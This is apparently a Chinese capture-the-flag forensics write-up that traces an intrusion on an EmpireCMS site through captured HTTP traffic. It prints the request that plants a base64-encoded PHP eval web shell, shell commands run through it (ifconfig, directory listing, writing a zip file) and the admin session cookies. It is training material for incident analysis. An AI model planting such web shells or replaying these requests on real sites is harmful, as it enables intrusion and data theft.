附件地址:链接:https://caiyun.139.com/m/i?125Ce4UIWFs84
提取码:HY3O
1、服务器自带的后门文件名是什么?(含文件后缀)
解题步骤
过滤出http协议的流量包,追踪tcp流,在流10062中发现写入了d00r.php,故预留的后门为ViewMore.php
GET /e/public/ViewClick/ViewMore.php HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:41:08 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
POST /e/public/ViewClick/ViewMore.php HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
Origin: http://192.168.162.130:82
Connection: keep-alive
Referer: http://192.168.162.130:82/e/public/ViewClick/ViewMore.php
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8
Upgrade-Insecure-Requests: 1
a=file_put_contents%28%27d00r.php%27%2C+base64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs%2FPg%3D%3D%27%29%29%3BHTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:41:31 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
GET / HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:41:43 GMT
Content-Type: text/html
Last-Modified: Sun, 17 Apr 2022 10:37:13 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"625bedd9-2b98"
Content-Encoding: gzip
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>........................ - Powered by EmpireCMS</title>
<meta name="keywords" content="........................,EmpireCMS" />
<meta name="description" content="..................................................................................................................(EmpireCMS).......................................CMS..................................................................................................................EmpireCMS.............................................................................................................................................................................................CMS........." />
<link href="/skin/default/css/style.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/skin/default/js/tabs.js"></script>
</head>
<body class="homepage">
<!-- ...... -->
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="top">
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="63%">
<!-- ...... -->
<script>
document.write('<script src="/e/member/login/loginjs.php?t='+Math.random()+'"><'+'/script>');
</script>
</td>
<td align="right">
<a onclick="window.external.addFavorite(location.href,document.title)" href="#ecms">............</a> | <a onclick="this.style.behavior='url(#default#homepage)';this.setHomePage('/')" href="#ecms">............</a> | <a href="/e/member/cp/">............</a> | <a href="/e/DoInfo/">............</a> | <a href="/e/web/?type=rss2&classid=0" target="_blank">RSS<img src="/skin/default/images/rss.gif" border="0" hspace="2" /></a>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table width="100%" border="0" cellpadding="0" cellspacing="10">
<tr valign="middle">
<td width="240" align="center"><a href="/"><img src="/skin/default/images/logo.gif" width="200" height="65" border="0" /></a></td>
<td align="center"><a href="http://www.phome.net/OpenSource/" target="_blank"><img src="/skin/default/images/opensource.gif" width="100%" height="70" border="0" /></a></td>
</tr>
</table>
<!-- ......tab......... -->
<table width="920" border="0" align="center" cellpadding="0" cellspacing="0" class="nav">
<tr>
<td class="nav_global"><ul>
<li class="curr" id="tabnav_btn_0" onmouseover="tabit(this)"><a href="/">......</a></li>
</ul></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="10" cellpadding="0">
<tr valign="top">
<td class="sider"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="title">
<tr>
<td><strong>............</strong></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="box">
<tr>
<td><ul>
</ul>
</td>
</tr>
</table></td>
<td class="content"><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>
<!-- ............................................................... -->
<script type="text/javascript">
<!--
var interval_time=3;
var focus_width=450;
var focus_height=250;
var text_height=0;
var text_align="center";
var swf_height = focus_height+text_height;
var swfpath="/e/data/images/pixviewer.swf";
var swfpatha="/e/data/images/pixviewer.swf";
var pics="";
var links="";
var texts="";
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="'+ focus_width +'" height="'+ swf_height +'">');
document.write('<param name="movie" value="'+swfpath+'"><param name="quality" value="high"><param name="bgcolor" value="#ffffff">');
document.write('<param name="menu" value="false"><param name=wmode value="opaque">');
document.write('<param name="FlashVars" value="pics='+pics+'&links='+links+'&texts='+texts+'&borderwidth='+focus_width+'&borderheight='+focus_height+'&textheight='+text_height+'&text_align='+text_align+'&interval_time='+interval_time+'">');
document.write('<embed src="'+swfpath+'" wmode="opaque" FlashVars="pics='+pics+'&links='+links+'&texts='+texts+'&borderwidth='+focus_width+'&borderheight='+focus_height+'&textheight='+text_height+'&text_align='+text_align+'&interval_time='+interval_time+'" menu="false" bgcolor="#ffffff" quality="high" width="'+ focus_width +'" height="'+ swf_height +'" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />');
document.write('</object>');
//-->
</script>
</td>
</tr>
</table>
<!-- .................. -->
<table width="100%" border="0" cellspacing="8" cellpadding="0" class="focus">
<tr>
<td></td>
</tr>
<tr>
<td align="center"></td>
</tr>
</table></td>
<td class="sider"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="title">
<tr>
<td><strong>............</strong></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="box no_doc">
<tr>
<td><ul>
</ul></td>
</tr>
</table></td>
</tr>
</table>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" class="banner_ad"><a href="http://www.phome.net/ebak2008/" target="_blank" title=".................."><img src="/skin/default/images/empirebak.gif" width="920" height="90" border="0" /></a></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="10" cellpadding="0">
<tr valign="top">
<td width="230" class="sider"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="title">
<tr>
<td><strong><a href="/info/">............</a></strong></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="box">
<tr>
<td><ul>
</ul></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="title margin_top">
<tr>
<td><strong><a href="/download/">............</a></strong></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="box no_doc">
<tr>
<td><ul>
</ul></td>
</tr>
</table></td>
<td class="content"><!-- tab............................................................onmouseover......onclick -->
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="tbtn1">
<tr>
<td class="tbtncon"><ul><li class="curr" id="tab1_btn_0" onmouseover="etabit(this)">......</li><li id="tab1_btn_1" onmouseover="etabit(this)">......</li><li id="tab1_btn_2" onmouseover="etabit(this)">......</li><li id="tab1_btn_3" onmouseover="etabit(this)">FLASH</li></ul></td>
</tr>
<tr>
<td class="picList"><div id="tab1_div_0">
</div>
<div id="tab1_div_1" style="display:none;">
</div>
<div id="tab1_div_2" style="display:none;">
</div>
<div id="tab1_div_3" style="display:none;">
</div></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="title margin_top">
<tr>
<td><strong>............</strong></td>
</tr>
</table>
<table width="100%" border="0" cellpadding="0" cellspacing="0" class="box">
<tr valign="top">
<td width="50%"><table width="100%" border="0" cellpadding="0" cellspacing="0" class="news_title">
<tr>
<td>......ID=<b>34</b>...............(............=2) </td>
</tr>
</table>
<ul>
......ID=<b>34</b>...............(............=0)
</ul></td>
<td width="50%"><table width="100%" border="0" cellpadding="0" cellspacing="0" class="news_title">
<tr>
<td>......ID=<b>35</b>...............(............=2)</td>
</tr>
</table>
<ul>
......ID=<b>35</b>...............(............=0)
</ul></td>
</tr>
</table></td>
<td width="240" class="sider"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="title">
<tr>
<td><strong>............</strong></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="box">
<tr>
<td><ol class="rank">
</ol></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="title margin_top">
<tr>
<td><strong>..................</strong></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="box">
<tr>
<td><ul>
</ul></td>
</tr>
</table></td>
</tr>
</table>
<!-- ............ -->
<table width="100%" border="0" cellspacing="10" cellpadding="0" class="links">
<tr>
<td><table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="#E9F2FB" class="title">
<tr>
<td><strong>............</strong></td>
<td align="right"> </td>
</tr>
</table>
<table width="100%" border="0" cellspacing="10" cellpadding="0" class="box">
<tr>
<td>
<!-- ............ -->
<hr width="100%" size="1" noshade="noshade" />
<!-- logo...... -->
</td>
</tr>
</table></td>
</tr>
</table>
<!-- ...... -->
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td align="center" class="search">
<form action="/e/search/index.php" method="post" name="searchform" id="searchform">
<table border="0" cellspacing="6" cellpadding="0">
<tr>
<td><strong>...............</strong>
<input name="keyboard" type="text" size="32" id="keyboard" class="inputText" />
<input type="hidden" name="show" value="title" />
<input type="hidden" name="tempid" value="1" />
<select name="tbname">
<option value="news">......</option>
<option value="download">......</option>
<option value="photo">......</option>
<option value="flash">FLASH</option>
<option value="movie">......</option>
<option value="shop">......</option>
<option value="article">......</option>
<option value="info">............</option>
</select>
</td>
<td><input type="image" class="inputSub" src="/skin/default/images/search.gif" />
</td>
<td><a href="/search/" target="_blank">............</a></td>
</tr>
</table>
</form>
</td>
</tr>
<tr>
<td>
<table width="100%" border="0" cellpadding="0" cellspacing="4" class="copyright">
<tr>
<td align="center"><a href="/">............</a> | <a href="#">............</a>
| <a href="#">............</a> | <a href="#">............</a> | <a href="#">............</a>
| <a href="#">............</a> | <a href="#">............</a> | <a href="/e/wap/" target="_blank">WAP</a></td>
</tr>
<tr>
<td align="center">Powered by <strong><a href="http://www.phome.net" target="_blank">EmpireCMS</a></strong>
<strong><font color="#FF9900">7.5</font></strong> © 2002-2018
<a href="http://www.digod.com" target="_blank">EmpireSoft Inc.</a></td>
</tr>
</table>
</td>
</tr>
</table>
</body>
</html>
flag{ViewMore.php}
2、服务器的内网IP是多少?
解题步骤
通过第一问发现写入的一句话木马参数为cmd,通过过滤post提交方法的包以及包含cmd字符串的http包,发现执行了ipconfig命令
追踪http流发现内网ip
请求包
POST /e/public/ViewClick/d00r.php HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://192.168.162.130:82
Connection: keep-alive
Referer: http://192.168.162.130:82/e/public/ViewClick/d00r.php
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8; uthnologinnum=1; uthnolastlogintime=1653842544; pdkemecmsdodbdata=empirecms; pdkemloginuserid=1; pdkemloginusername=admin; pdkemloginrnd=INFhTsklTmjnFzfOZtAz; pdkemloginlevel=1; pdkemeloginlic=empirecmslic; pdkemloginadminstyleid=1; pdkemloginecmsckpass=6f8d543c26e846056bf8e3ac2b865c36; pdkemloginecmsckfrnd=LhitdkhqjwBZzWPM2HdHriVI00E; pdkemloginecmsckfdef=Z10cCLkIIMNt0amoD0OJmD; pdkememecXmngEOxi=zRaZTxhh3rNGu9UERE; pdkemlogintime=1653842559; pdkemtruelogintime=1653842549
Upgrade-Insecure-Requests: 1
cmd=system%28%27ifconfig%27%29%3BHTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:44:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
br-2fc7bfd07160: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 02:42:7b:5a:86:ea txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 02:42:b9:e3:56:83 txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.162.130 netmask 255.255.255.0 broadcast 192.168.162.255
inet6 fe80::ae06:234d:1e0a:9aac prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:08:04:89 txqueuelen 1000 (Ethernet)
RX packets 397410 bytes 398085633 (398.0 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 140095 bytes 20078864 (20.0 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ens38: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.101.132 netmask 255.255.255.0 broadcast 192.168.101.255
inet6 fe80::68af:1a5:a54c:7366 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:08:04:93 txqueuelen 1000 (Ethernet)
RX packets 362 bytes 35928 (35.9 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1654 bytes 141760 (141.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 7070 bytes 3169973 (3.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 7070 bytes 3169973 (3.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
flag{192.168.101.132}
3、攻击者往服务器中写入的key是什么?
解题步骤
如上第二问的过滤规则,发现file_put_contents写入内容
进行代码进行解码
请求包
POST /e/public/ViewClick/d00r.php HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 347
Origin: http://192.168.162.130:82
Connection: keep-alive
Referer: http://192.168.162.130:82/e/public/ViewClick/d00r.php
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8; uthnologinnum=1; uthnolastlogintime=1653842544; pdkemecmsdodbdata=empirecms; pdkemloginuserid=1; pdkemloginusername=admin; pdkemloginrnd=INFhTsklTmjnFzfOZtAz; pdkemloginlevel=1; pdkemeloginlic=empirecmslic; pdkemloginadminstyleid=1; pdkemloginecmsckpass=6f8d543c26e846056bf8e3ac2b865c36; pdkemloginecmsckfrnd=LhitdkhqjwBZzWPM2HdHriVI00E; pdkemloginecmsckfdef=Z10cCLkIIMNt0amoD0OJmD; pdkememecXmngEOxi=zRaZTxhh3rNGu9UERE; pdkemlogintime=1653842559; pdkemtruelogintime=1653842549
Upgrade-Insecure-Requests: 1
cmd=file_put_contents%28%27k3y_f1le%27%2C+base64_decode%28%27UEsDBBQAAQAAANgDvlTRoSUSMAAAACQAAAAHAAAAa2V5LnR4dGYJZVtgRzdJtOnW1ycl%2FO%2FAJ0rmzwNXxqbCRUq2LQid0gO2yXaPBcc9baLIAwnQ71BLAQI%2FABQAAQAAANgDvlTRoSUSMAAAACQAAAAHACQAAAAAAAAAIAAAAAAAAABrZXkudHh0CgAgAAAAAAABABgAOg7Zcnlz2AE6DtlyeXPYAfldXhh5c9gBUEsFBgAAAAABAAEAWQAAAFUAAAAAAA%3D%3D%27%29%29%3BHTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:46:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
利用python将解密的文件写入zip中
python代码如下:
import base64
with open('1.txt','r') as f:
text=f.read()
text_bs64_decode=base64.b64decode(text)
with open ('1.zip','wb') as f:
f.write(text_bs64_decode)
解码发现为zip压缩包,故另存为zip
追踪流10098发现密码
请求包:
7e03864b0db7e6f9POST /e/public/ViewClick/d00r.php HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://192.168.162.130:82
Connection: keep-alive
Referer: http://192.168.162.130:82/e/public/ViewClick/d00r.php
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8; uthnologinnum=1; uthnolastlogintime=1653842544; pdkemecmsdodbdata=empirecms; pdkemloginuserid=1; pdkemloginusername=admin; pdkemloginrnd=INFhTsklTmjnFzfOZtAz; pdkemloginlevel=1; pdkemeloginlic=empirecmslic; pdkemloginadminstyleid=1; pdkemloginecmsckpass=6f8d543c26e846056bf8e3ac2b865c36; pdkemloginecmsckfrnd=LhitdkhqjwBZzWPM2HdHriVI00E; pdkemloginecmsckfdef=Z10cCLkIIMNt0amoD0OJmD; pdkememecXmngEOxi=zRaZTxhh3rNGu9UERE; pdkemlogintime=1653842559; pdkemtruelogintime=1653842549
Upgrade-Insecure-Requests: 1
cmd=system%28%27ls+%2Fwww%2Fwwwroot%27%29%3BHTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:46:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
cms.com
default
www.1.com
利用7e03864b0db7e6f9进行解密得到key值